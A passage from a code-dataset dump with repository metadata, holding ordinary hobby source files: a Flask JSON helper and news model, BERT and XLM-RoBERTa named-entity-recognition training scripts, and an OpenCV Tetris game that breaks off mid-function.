"text": "import json\nfrom datetime import datetime\nfrom flask import request\nclass DateEncoder(json.JSONEncoder):\n def default(self,obj):\n if isinstance(obj, datetime):\n return obj.strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(obj, date):\n return obj.strftime(\"%Y-%m-%d\")\n else:\n return json.JSONEncoder.default(self, obj)\n\ndef jsonLoads():\n # print(request.get_data(as_text=True))\n return json.loads(request.get_data(as_text=True))\n\ndef jsonDumps(data):\n return json.dumps(data,ensure_ascii=False, cls=DateEncoder)"
},
{
"alpha_fraction": 0.6263065934181213,
"alphanum_fraction": 0.6511324048042297,
"avg_line_length": 44.91999816894531,
"blob_id": "27f5fda74888262ed65912bd498a08248e1b6d7a",
"content_id": "79a45d7ed24ec3b1bccebf589b13fd3490d207b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2484,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 50,
"path": "/python/python-web/apps/model/News.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom datetime import datetime \nfrom ..database import db\nfrom .Base import Base\n# print ('abc',db)\n# class News(db.Model):\n# def __init__(self,title):\n# pass\n\n# def asdfasd(self):\n# pass\n# from .. import db\n# # print db\nclass News(Base,db.Model):\n __tablename__ = 'news'\n id = db.Column(db.Integer, primary_key=True,unique=True,index=True) # 'ID',\n newsclassid = db.Column(db.Integer,nullable=True) # 'newsclassid',\n title = db.Column('title',db.String(100),nullable=True) # 'title',\n keywork = db.Column(db.String(200),nullable=True) #'关键字',\n description = db.Column(db.String(500),nullable=True) #'描述',\n addtime = db.Column(db.DateTime(),default=datetime.now) #'添加时间',\n updatetime = db.Column(db.DateTime(),default=datetime.now) #'修改时间',\n deletetime = db.Column(db.DateTime(),default=datetime.now) #'删除时间',\n order = db.Column(db.Float(),default=1) #'排序',\n code = db.Column(db.String(32),unique=True,nullable=True) #'编码',\n name = db.Column(db.String(200),nullable=True) #'名称',\n pinyinname = db.Column(db.String(200),nullable=True) #'名称拼音',\n cnname = db.Column(db.String(200),nullable=True) # '中文名称预留',\n enname = db.Column(db.String(200),nullable=True) #'英文名称',\n color = db.Column(db.String(200),nullable=True) #'名称颜色',\n classname = db.Column(db.String(1000),nullable=True) #'class名',\n style = db.Column(db.Unicode(2000),nullable=True) #'样式',\n link = db.Column(db.String(1000),nullable=True) #'链接地址',\n author = db.Column(db.String(200),nullable=True) #'添加或修改人',\n image = db.Column(db.String(1000),nullable=True) #'图片地址',\n smallimage = db.Column(db.String(1000),nullable=True) #'小图片地址',\n bigimage = db.Column(db.String(1000),nullable=True) #'大图片地址',\n desc = db.Column(db.Text,nullable=True) #'说明',\n isdefault = db.Column(db.Boolean(),default=False) #'是否默认',\n ishot = db.Column(db.Boolean(),default=False) #'是否热点',\n isstatic = db.Column(db.Boolean(),default=False) #'是否静态',\n isdelete = db.Column(db.Boolean(),default=False) #'是否删除',\n isrecommend = db.Column(db.Boolean(),default=False) #'是否推荐',\n count = db.Column(db.BigInteger(),default=0) #'点击数量',\n\n # def __init__(self):\n # pass\n # def __repr__(self):\n # return '<News %r>' % self.username\n"
},
{
"alpha_fraction": 0.6870588064193726,
"alphanum_fraction": 0.6917647123336792,
"avg_line_length": 20.25,
"blob_id": "88385e9faae98720406d75983f73bb87b5e9b964",
"content_id": "656a62379642ca03dc90ad6b40b79d6c724c5462",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 20,
"path": "/python/python-web/apps/routers/data.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template\nfrom ..database import db\ndataIndex=Blueprint('data_index',__name__)\n# print(dir(News))\[email protected]('/data')\ndef data_index():\n return 'db'\n\[email protected]('/data/create')\ndef data_create():\n db.create_all()\n return 'db.create_all'\n\[email protected]('/data/drop')\ndef data_drop():\n db.drop_all()\n return 'db.drop_all'\n # return 'main'\n"
}
] | 28 |
Ryzhtus/multilingual-bert-ner | https://github.com/Ryzhtus/multilingual-bert-ner | ee9a96e38bcae3ca23b704591a28ee60238e499d | 08abaa5730f3b069bb2b6868a95ba0af20e811ca | a0190c2c06ead6e74bf95a0695931e126f1399af | refs/heads/main | 2023-04-03T14:38:04.275300 | 2021-04-21T13:41:05 | 2021-04-21T13:41:05 | 338,257,357 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6166788339614868,
"alphanum_fraction": 0.6232626438140869,
"avg_line_length": 34.07692337036133,
"blob_id": "f41d659a2ccb8526bf6d8c6c556ddfa392012060",
"content_id": "3b6ba7f7aa9b3d5e7d3366971d3a4703be5aed2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1367,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 39,
"path": "/multilingual_ner/XLM/metrics.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from seqeval.metrics import accuracy_score\n\n\nclass FMeasureStorage():\n def __init__(self):\n self.true_positive = 0\n self.false_positive = 0\n self.true_negative = 0\n self.false_negative = 0\n\n def __add__(self, iteration_result: dict):\n self.true_positive += iteration_result['TP']\n self.false_positive += iteration_result['FP']\n self.true_negative += iteration_result['TN']\n self.false_negative += iteration_result['FN']\n\n def print_rates(self):\n print('True Positives {} | False Positives {} | True Negatives {} | False Negatives {}'.format(\n self.true_positive, self.false_positive, self.true_negative, self.false_negative), end='\\n')\n\n def report(self):\n precision = self.true_positive / max(1, (self.true_positive + self.false_positive))\n recall = self.true_positive / max(1, (self.true_positive + self.false_negative))\n f1_score = 2 * (precision * recall) / (precision + recall)\n\n return f1_score, precision, recall\n\n\nclass AccuracyStorage():\n def __init__(self):\n self.true_labels = []\n self.pred_labels = []\n\n def __add__(self, labels: dict):\n self.true_labels.extend(labels['true'])\n self.pred_labels.extend(labels['pred'])\n\n def report(self):\n return accuracy_score(self.true_labels, self.pred_labels)"
},
{
"alpha_fraction": 0.6702954769134521,
"alphanum_fraction": 0.6749610900878906,
"avg_line_length": 34.77777862548828,
"blob_id": "f478c13e129b85297df816742a159b990431fedf",
"content_id": "a5186a74505075c6b5019d2f1a10fcede62e4f45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 643,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 18,
"path": "/multilingual_ner/mBERT/model.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from transformers import BertModel\nimport torch.nn as nn\n\nclass BertNER(nn.Module):\n def __init__(self, num_classes, pretrained='bert-base-multilingual-cased'):\n super(BertNER, self).__init__()\n self.embedding_dim = 768\n self.num_classes = num_classes\n\n self.bert = BertModel.from_pretrained(pretrained, output_attentions=True)\n self.linear = nn.Linear(self.embedding_dim, self.num_classes)\n\n def forward(self, tokens):\n outputs = self.bert(tokens)\n last_hidden_state = outputs['last_hidden_state']\n predictions = self.linear(last_hidden_state)\n\n return predictions, outputs"
},
{
"alpha_fraction": 0.5354821085929871,
"alphanum_fraction": 0.547535240650177,
"avg_line_length": 40.25698471069336,
"blob_id": "f52878414f7d867e7569afe97e80b6adc6a38ccd",
"content_id": "dbb650e64cfcdd90b4fa1cedb911982d84f68612",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7384,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 179,
"path": "/multilingual_ner/XLM/train.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from multilingual_ner.mBERT.metrics import FMeasureStorage\nfrom seqeval.metrics import performance_measure\n\nimport torch\nimport torch.nn as nn\n\ndef clear_tags(labels, predictions, idx2tag, tag2idx, batch_element_length):\n \"\"\" this function removes <PAD>, CLS and SEP tags at each sentence\n and convert both ids of tags and batch elements to SeqEval input format\n [[first sentence tags], [second sentence tags], ..., [last sentence tags]]\"\"\"\n\n clear_labels = []\n clear_predictions = []\n\n sentence_labels = []\n sentence_predictions = []\n\n sentence_length = 0\n\n for idx in range(len(labels)):\n if labels[idx] != tag2idx['<pad>']:\n sentence_labels.append(idx2tag[labels[idx]])\n sentence_predictions.append(idx2tag[predictions[idx]])\n sentence_length += 1\n\n if sentence_length == batch_element_length:\n # not including the 0 and the last element of list, because of CLS and SEP tokens\n clear_labels.append(sentence_labels[1: len(sentence_labels) - 1])\n clear_predictions.append(sentence_predictions[1: len(sentence_predictions) - 1])\n sentence_labels = []\n sentence_predictions = []\n sentence_length = 0\n else:\n if sentence_labels:\n clear_labels.append(sentence_labels[1: len(sentence_labels) - 1])\n clear_predictions.append(sentence_predictions[1: len(sentence_predictions) - 1])\n sentence_labels = []\n sentence_predictions = []\n else:\n pass\n\n return clear_labels, clear_predictions\n\ndef train_epoch(model, criterion, optimizer, data, tag2idx, idx2tag, device, scheduler):\n epoch_loss = 0\n epoch_metrics = FMeasureStorage()\n\n model.train()\n\n for batch in data:\n tokens = batch[0].to(device)\n tags = batch[1].to(device)\n\n batch_element_length = len(tags[0])\n\n predictions = model(tokens)\n predictions = predictions.view(-1, predictions.shape[-1])\n\n tags_mask = tags != tag2idx['<pad>']\n tags_mask = tags_mask.view(-1)\n labels = torch.where(tags_mask, tags.view(-1), torch.tensor(criterion.ignore_index).type_as(tags))\n\n loss = criterion(predictions, labels)\n\n predictions = predictions.argmax(dim=1)\n\n predictions = predictions.cpu().numpy()\n labels = labels.cpu().numpy()\n\n # clear <PAD>, CLS and SEP tags from both labels and predictions\n clear_labels, clear_predictions = clear_tags(labels, predictions, idx2tag, tag2idx, batch_element_length)\n\n iteration_result = performance_measure(clear_labels, clear_predictions)\n\n epoch_metrics + iteration_result\n epoch_loss += loss.item()\n\n optimizer.zero_grad()\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), 1)\n optimizer.step()\n if scheduler:\n scheduler.step()\n torch.cuda.empty_cache()\n\n epoch_f1_score, epoch_precision, epoch_recall = epoch_metrics.report()\n print('Train Loss = {:.5f}, F1-score = {:.3%}, Precision = {:.3%}, Recall = {:.3%}'.format(epoch_loss / len(data),\n epoch_f1_score,\n epoch_precision,\n epoch_recall))\n\n\ndef valid_epoch(model, criterion, data, tag2idx, idx2tag, device):\n epoch_loss = 0\n epoch_metrics = FMeasureStorage()\n\n model.eval()\n\n with torch.no_grad():\n for batch in data:\n tokens = batch[0].to(device)\n tags = batch[1].to(device)\n\n batch_element_length = len(tags[0])\n\n predictions = model(tokens)\n predictions = predictions.view(-1, predictions.shape[-1])\n tags_mask = tags != tag2idx['<pad>']\n tags_mask = tags_mask.view(-1)\n labels = torch.where(tags_mask, tags.view(-1), torch.tensor(criterion.ignore_index).type_as(tags))\n\n loss = criterion(predictions, labels)\n\n predictions = predictions.argmax(dim=1)\n\n predictions = predictions.cpu().numpy()\n labels = labels.cpu().numpy()\n\n # clear <PAD>, CLS and SEP tags from both labels and predictions\n clear_labels, clear_predictions = clear_tags(labels, predictions, idx2tag, tag2idx, batch_element_length)\n\n iteration_result = performance_measure(clear_labels, clear_predictions)\n\n epoch_metrics + iteration_result\n epoch_loss += loss.item()\n\n epoch_f1_score, epoch_precision, epoch_recall = epoch_metrics.report()\n print('Valid Loss = {:.5f}, F1-score = {:.3%}, Precision = {:.3%}, Recall = {:.3%}'.format(epoch_loss / len(data),\n epoch_f1_score,\n epoch_precision,\n epoch_recall))\n\n\ndef test_epoch(model, criterion, data, tag2idx, idx2tag, device):\n epoch_loss = 0\n epoch_metrics = FMeasureStorage()\n\n model.eval()\n\n with torch.no_grad():\n for batch in data:\n tokens = batch[0].to(device)\n tags = batch[1].to(device)\n\n batch_element_length = len(tags[0])\n\n predictions = model(tokens)\n predictions = predictions.view(-1, predictions.shape[-1])\n tags_mask = tags != tag2idx['<pad>']\n tags_mask = tags_mask.view(-1)\n labels = torch.where(tags_mask, tags.view(-1), torch.tensor(criterion.ignore_index).type_as(tags))\n\n loss = criterion(predictions, labels)\n\n predictions = predictions.argmax(dim=1)\n\n predictions = predictions.cpu().numpy()\n labels = labels.cpu().numpy()\n\n # clear <PAD>, CLS and SEP tags from both labels and predictions\n clear_labels, clear_predictions = clear_tags(labels, predictions, idx2tag, tag2idx, batch_element_length)\n\n iteration_result = performance_measure(clear_labels, clear_predictions)\n\n epoch_metrics + iteration_result\n epoch_loss += loss.item()\n\n epoch_f1_score, epoch_precision, epoch_recall = epoch_metrics.report()\n print('Test Loss = {:.5f}, F1-score = {:.3%}, Precision = {:.3%}, Recall = {:.3%}'.format(epoch_loss / len(data),\n epoch_f1_score,\n epoch_precision,\n epoch_recall))\n\n\ndef train_model(model, criterion, optimizer, train_data, eval_data, tag2idx, idx2tag, device, scheduler, epochs=1):\n for epoch in range(epochs):\n print('Epoch {} / {}'.format(epoch + 1, epochs))\n train_epoch(model, criterion, optimizer, train_data, tag2idx, idx2tag, device, scheduler)\n valid_epoch(model, criterion, eval_data, tag2idx, idx2tag, device)"
},
{
"alpha_fraction": 0.5909494161605835,
"alphanum_fraction": 0.5953859686851501,
"avg_line_length": 32.81999969482422,
"blob_id": "43ef39e2be0653c83aaff68aecdf6f623305a7bd",
"content_id": "d3434bf967633f6d558f23903274a2d8489a51bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3381,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 100,
"path": "/multilingual_ner/mBERT/dataset.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.nn.utils.rnn import pad_sequence\nfrom collections import Counter\n\n\nclass WikiAnnDataset(Dataset):\n def __init__(self, sentences, tags, tokenizer):\n self.sentences = sentences\n self.sentences_tags = tags\n\n self.tokenizer = tokenizer\n\n self.ner_tags = ['<PAD>'] + list(set(tag for tag_list in self.sentences_tags for tag in tag_list))\n self.tag2idx = {tag: idx for idx, tag in enumerate(self.ner_tags)}\n self.idx2tag = {idx: tag for idx, tag in enumerate(self.ner_tags)}\n\n def __len__(self):\n return len(self.sentences)\n\n def __getitem__(self, item):\n words = self.sentences[item]\n tags = self.sentences_tags[item]\n\n word2tag = dict(zip(words, tags))\n\n tokens = []\n tokenized_tags = []\n\n for word in words:\n if word not in ('[CLS]', '[SEP]'):\n subtokens = self.tokenizer.tokenize(word)\n for i in range(len(subtokens)):\n tokenized_tags.append(word2tag[word])\n tokens.extend(subtokens)\n\n tokens = ['[CLS]'] + tokens + ['[SEP]']\n tokens_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n\n tokenized_tags = ['O'] + tokenized_tags + ['O']\n tags_ids = [self.tag2idx[tag] for tag in tokenized_tags]\n\n return torch.LongTensor(tokens_ids), torch.LongTensor(tags_ids)\n\n def entities_statistics(self):\n entity_types_counter = Counter()\n\n for tags_idx in range(len(self.sentences_tags)):\n entity = []\n\n for idx in range(len(self.sentences_tags[tags_idx])):\n if self.sentences_tags[tags_idx][idx] != 'O':\n entity.append(self.sentences_tags[tags_idx][idx])\n else:\n entity_types_counter['O'] += 1\n\n if entity:\n for idx in range(len(entity)):\n if entity[idx][0] == 'B':\n entity_tag = entity[idx][2:]\n entity_types_counter[entity_tag] += 1\n\n return entity_types_counter\n\n def BIO_tags_statistics(self):\n bio_types_counter = Counter()\n\n for tags_idx in range(len(self.sentences_tags)):\n for idx in range(len(self.sentences_tags[tags_idx])):\n bio_types_counter[self.sentences_tags[tags_idx][idx]] += 1\n\n return bio_types_counter\n\n def paddings(self, batch):\n tokens, tags = list(zip(*batch))\n\n tokens = pad_sequence(tokens, batch_first=True, padding_value=self.tag2idx['<PAD>'])\n tags = pad_sequence(tags, batch_first=True, padding_value=self.tag2idx['<PAD>'])\n\n return tokens, tags\n\n\ndef read_data(filename):\n rows = open(filename, 'r').read().strip().split(\"\\n\\n\")\n sentences, sentences_tags = [], []\n\n for sentence in rows:\n words = [line.split()[0][3:] for line in sentence.splitlines()]\n tags = [line.split()[-1] for line in sentence.splitlines()]\n sentences.append(words)\n sentences_tags.append(tags)\n\n return sentences, sentences_tags\n\n\ndef create_dataset_and_dataloader(filename, batch_size, tokenizer):\n sentences, tags = read_data(filename)\n dataset = WikiAnnDataset(sentences, tags, tokenizer)\n\n return dataset, DataLoader(dataset, batch_size, collate_fn=dataset.paddings)"
},
{
"alpha_fraction": 0.6654478907585144,
"alphanum_fraction": 0.6727604866027832,
"avg_line_length": 31.235294342041016,
"blob_id": "db6157077984c87c65e5a11b440bb06af6091362",
"content_id": "48d10b648100f0d309cf6cd1efc10cc471668d64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 547,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 17,
"path": "/multilingual_ner/XLM/model.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from transformers import XLMRobertaModel\nimport torch.nn as nn\n\nclass XLMRoBERTaNER(nn.Module):\n def __init__(self, num_classes):\n super(XLMRoBERTaNER, self).__init__()\n self.embedding_dim = 768\n self.num_classes = num_classes\n\n self.RoBERTa = XLMRobertaModel.from_pretrained(\"xlm-roberta-base\")\n self.linear = nn.Linear(self.embedding_dim, self.num_classes)\n\n def forward(self, tokens):\n embeddings = self.RoBERTa(tokens)[0]\n predictions = self.linear(embeddings)\n\n return predictions"
},
{
"alpha_fraction": 0.786415696144104,
"alphanum_fraction": 0.7937806844711304,
"avg_line_length": 39.766666412353516,
"blob_id": "b162a9ed10db470d9c470f7bc5ed0ec821835550",
"content_id": "9a81810dbd272a7a1e58c97f74f03697f254cfa1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1222,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 30,
"path": "/multilingual_ner/mBERT/run.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from multilingual_ner.mBERT.dataset import create_dataset_and_dataloader\nfrom multilingual_ner.mBERT.train import train_model\nfrom multilingual_ner.mBERT.model import BertNER\n\nfrom transformers import BertTokenizer\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nTOKENIZER = BertTokenizer.from_pretrained('bert-base-multilingual-cased', do_lower_case=False)\nDEVICE = 'cuda' if torch.cuda.is_available else 'cpu'\nEPOCHS = 4\nBATCH_SIZE = 16\n\n\ntrain_dataset, train_dataloader = create_dataset_and_dataloader('train', BATCH_SIZE, TOKENIZER)\neval_dataset, eval_dataloader = create_dataset_and_dataloader('validation', BATCH_SIZE, TOKENIZER)\ntest_dataset, test_dataloader = create_dataset_and_dataloader('test', BATCH_SIZE, TOKENIZER)\n\nclasses = len(train_dataset.ner_tags)\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nSpanishBertModel = BertNER(classes, pretrained='bert-base-multilingual-cased').to(device)\noptimizer = optim.AdamW(SpanishBertModel.parameters(), lr=2e-5)\ncriterion = nn.CrossEntropyLoss(ignore_index=0).to(device)\nEPOCHS = 4\n\ntrain_model(SpanishBertModel, criterion, optimizer, train_dataloader, eval_dataloader, train_dataset.tag2idx, train_dataset.idx2tag, device, None, EPOCHS)"
},
{
"alpha_fraction": 0.7815992832183838,
"alphanum_fraction": 0.7893379330635071,
"avg_line_length": 39.13793182373047,
"blob_id": "f283cae2e4ce8c38952783644a96e6dcb6524fff",
"content_id": "089d9a31da5bdf489d36d985197c197b3860a820",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1163,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 29,
"path": "/multilingual_ner/XLM/run.py",
"repo_name": "Ryzhtus/multilingual-bert-ner",
"src_encoding": "UTF-8",
"text": "from multilingual_ner.XLM.dataset import create_dataset_and_dataloader\nfrom multilingual_ner.XLM.train import train_model\nfrom multilingual_ner.XLM.model import XLMRoBERTaNER\n\nfrom transformers import XLMRobertaTokenizer\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nTOKENIZER = XLMRobertaTokenizer.from_pretrained('xlm-roberta-base', do_lower_case=False)\nDEVICE = 'cuda' if torch.cuda.is_available else 'cpu'\nEPOCHS = 4\nBATCH_SIZE = 16\n\ntrain_dataset, train_dataloader = create_dataset_and_dataloader('train', BATCH_SIZE, TOKENIZER)\neval_dataset, eval_dataloader = create_dataset_and_dataloader('validation', BATCH_SIZE, TOKENIZER)\ntest_dataset, test_dataloader = create_dataset_and_dataloader('test', BATCH_SIZE, TOKENIZER)\n\nclasses = len(train_dataset.ner_tags)\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nXLM_Model = XLMRoBERTaNER(classes).to(device)\noptimizer = optim.AdamW(XLM_Model.parameters(), lr=2e-5)\ncriterion = nn.CrossEntropyLoss(ignore_index=0).to(device)\nEPOCHS = 4\n\ntrain_model(XLM_Model, criterion, optimizer, train_dataloader, eval_dataloader, train_dataset.tag2idx, train_dataset.idx2tag, device, None, EPOCHS)"
}
] | 7 |
liuguangyuan/tetris | https://github.com/liuguangyuan/tetris | e380756212232eed04ea47d5a3dbe8c58c82b056 | 8c1dd7a055130dca8d3de39bc485acb87ab1a817 | d3d240581419b1024c676b99570266be6ef95a36 | refs/heads/master | 2021-04-09T11:50:10.720011 | 2018-03-16T11:26:16 | 2018-03-16T11:26:16 | 125,476,000 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.47085657715797424,
"alphanum_fraction": 0.4982260465621948,
"avg_line_length": 25.66216278076172,
"blob_id": "3e4ddba35f9f58dcf59a3249187074a7b3c04881",
"content_id": "0195aea867e3bc08659fb2f05702bc3faa2a28b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1973,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 74,
"path": "/main.py",
"repo_name": "liuguangyuan/tetris",
"src_encoding": "UTF-8",
"text": "import sys\nimport cv2\nimport numpy as np\nfrom actor import Actor, ACTORS \nfrom background import Bg\nimport random\nimport time\n\ndef show(img_name, img_data, x=0, y=0):\n cv2.namedWindow(img_name)\n cv2.moveWindow(img_name, x, y)\n cv2.imshow(img_name, img_data)\n\ndef get_actor(col):\n mmax = len(ACTORS) - 1 \n p = random.randint(0, mmax)\n dataset = ACTORS[p]\n _, acol = dataset.shape \n y = (col - acol) / 2\n return Actor(dataset, 0, y) \n\nif __name__ == '__main__':\n _quit = False \n col = 10 \n dataset = np.zeros((20, col), dtype=int)\n bg = Bg(dataset)\n tmp_bg = bg\n curr_actor = None\n reserve_actor = get_actor(col)\n begin_time = time.time() \n score = 0\n while not _quit:\n if not curr_actor:\n curr_actor = reserve_actor\n reserve_actor = get_actor(col)\n show('next actor', reserve_actor.get_img(), 200, 0)\n tmp_bg = bg.add(curr_actor)\n show('tetris', tmp_bg.get_img(), 500, 0)\n print('****************')\n print('score:', score)\n print('time: ', time.time() - begin_time)\n print('****************')\n print('')\n\n c = cv2.waitKey(1000)\n if c == 27:\n _quit = True \n elif c == 65361:\n curr_actor.left(bg)\n tmp_bg = bg.add(curr_actor)\n continue\n elif c == 65363:\n curr_actor.right(bg)\n tmp_bg = bg.add(curr_actor)\n continue\n elif c == 65362:\n curr_actor.rotate(bg)\n tmp_bg = bg.add(curr_actor)\n\n elif c == 65364:\n curr_actor.Down(bg)\n else:\n pass\n ret = curr_actor.Down(bg)\n if curr_actor.x == 0:\n sys.exit('game over')\n tmp_bg = bg.add(curr_actor)\n if ret == -1:\n bg = tmp_bg\n bg.refresh()\n tmp_bg = bg\n curr_actor = None\n score = score + 1\n cv2.destroyAllWindows()\n"
},
{
"alpha_fraction": 0.4843423664569855,
"alphanum_fraction": 0.49269309639930725,
"avg_line_length": 25.127273559570312,
"blob_id": "8802ef5b417bb7aac3ff8056266708656878d8da",
"content_id": "0a1e46df8c2efa40f7e70375cd8e247c5e35cf52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1437,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 55,
"path": "/background.py",
"repo_name": "liuguangyuan/tetris",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom display import Dp\nclass Bg:\n def __init__(self, dataset):\n self.__dataset = dataset\n\n def add(self, actor):\n tmp = np.array(self.__dataset, copy=True)\n row, col = actor.shape()\n x = actor.x\n y = actor.y\n for i in range(row):\n for j in range(col):\n tmp[x+i][y+j] = tmp[x+i][y+j] + actor.value()[i][j]\n\n return Bg(tmp) \n\n def refresh(self):\n ds = []\n row, col = self.__dataset.shape\n for i in range(row):\n sum = 0\n for j in range(col):\n sum = sum + self.__dataset[i][j]\n if sum == col:\n ds.append(i)\n tmp = np.delete(self.__dataset, ds, 0)\n for i in range(len(ds)):\n tmp = np.insert(tmp, 0, np.array(col*[0]), 0)\n self.__dataset = tmp\n\n def value(self):\n return self.__dataset\n\n def shape(self):\n return self.__dataset.shape\n\n def clear(self):\n row, col = self.__dataset.shape\n for i in range(row):\n for j in range(col):\n self.__dataset[i][j] = 0\n\n def get_img(self):\n dp = Dp(self.__dataset)\n return dp.get_img()\n\nif __name__ == '__main__':\n from actor import Actor, ACTORS\n dataset = np.zeros((10, 8), dtype=int)\n print dataset\n bg = Bg(dataset)\n ac = Actor(ACTORS[0], 1,1)\n tmp = bg.add(ac)\n print tmp.value()\n"
},
{
"alpha_fraction": 0.5193405151367188,
"alphanum_fraction": 0.5358275175094604,
"avg_line_length": 32.553192138671875,
"blob_id": "c4a14a41e5f403c456af5d34e66b1d8b43ddafd2",
"content_id": "1465b330ee17a529343486c9f1f273ea910894c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1577,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 47,
"path": "/display.py",
"repo_name": "liuguangyuan/tetris",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nclass Dp:\n def __init__(self, dataset0, length=32, thick=2):\n self.length = length\n self.thick = thick\n self.o_length = length - thick\n self.__BLACK = self.__get_black()\n self.__WHITE = self.__get_white()\n row,col = dataset0.shape\n self.__dataset = np.zeros((row*length, col*length))\n for i in range(row):\n for j in range(col):\n bi = length*i\n bj = length*j\n if dataset0[i][j] == 1:\n self.__dataset[bi:bi+length, bj:bj+length] = self.__BLACK\n else:\n self.__dataset[bi:bi+length, bj:bj+length] = self.__WHITE\n self.__img = np.reshape(self.__dataset,(row*length, col*length, 1))\n\n def __get_black(self):\n length = self.length\n o_length = self.o_length\n thick = self.thick\n black = 255*np.ones((length, length), dtype = np.int)\n black[thick:o_length,thick:o_length] = black[thick:o_length,thick:o_length] -255\n return black\n\n def __get_white(self):\n length = self.length\n o_length = self.o_length\n thick = self.thick\n white = np.zeros((length, length), dtype=np.int)\n white[thick:o_length, thick:o_length] = white[thick:o_length, thick:o_length] + 255\n return white\n\n def get_img(self):\n return self.__img\n\nif __name__ == '__main__':\n import cv2\n a = np.array([[0,1],[0,0]])\n dp = Dp(a, length = 32)\n print dp.get_img()\n cv2.imshow('av', dp.get_img())\n cv2.waitKey()\n"
},
{
"alpha_fraction": 0.41777586936950684,
"alphanum_fraction": 0.4555603265762329,
"avg_line_length": 24.877777099609375,
"blob_id": "4404700481c82058384a1098c270f15ab5d0fda8",
"content_id": "12d488019319a44a91915a8568594ec7809c8c2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2329,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 90,
"path": "/actor.py",
"repo_name": "liuguangyuan/tetris",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom display import Dp\n\nACTOR0 = np.array([[1], [1], [1], [1]])\nACTOR1 = np.array([[1, 1], [0, 1], [0, 1]])\nACTOR2 = np.array([[1, 1], [1, 0], [1, 0]])\nACTOR3 = np.array([[0, 1], [1, 1], [0, 1]])\nACTOR4 = np.array([[1, 0], [1, 1], [1, 0]])\nACTOR5 = np.array([[1, 1], [1, 1]])\nACTOR6 = np.array([[0, 1], [1, 1], [1, 0]])\nACTOR7 = np.array([[1, 0], [1, 1], [0, 1]])\nACTORS = [ACTOR0, ACTOR1, ACTOR2, ACTOR3, ACTOR4, ACTOR5, ACTOR6, ACTOR7]\n\nclass Actor:\n def __init__(self, dataset, x=0, y=0):\n self.__dataset = dataset \n self.x = x \n self.y = y\n\n def value(self):\n return self.__dataset\n\n def shape(self):\n return self.__dataset.shape\n\n def rotate(self, bg):\n dataset = np.rot90(self.__dataset)\n x = self.x\n y = self.y\n \n brow, bcol = bg.shape()\n row, col = dataset.shape \n if x + row > brow - 1 or y + col > bcol - 1:\n return -1 \n if self.overlap(bg, x, y):\n return -1 \n self.__dataset = dataset\n\n return 0 \n\n def left(self, bg):\n x = self.x\n y = self.y - 1 \n if y < 0:\n return -1 \n if self.overlap(bg, x, y):\n return -1 \n self.y = y\n return 0 \n\n def right(self, bg):\n x = self.x\n y = self.y + 1\n col = self.__dataset.shape[1]\n if y + col > bg.shape()[1]:\n return -1 \n if self.overlap(bg, x, y):\n return -1\n self.y = y\n return 0 \n\n def Down(self, bg):\n x = self.x + 1\n y = self.y\n row = self.__dataset.shape[0]\n if x + row > bg.shape()[0]:\n return -1 \n if self.overlap(bg, x, y):\n return -1\n self.x = x\n return 0 \n\n def overlap(self, bg, x, y):\n array = np.array(self.__dataset, copy=True)\n row, col = self.__dataset.shape\n for i in range(row):\n 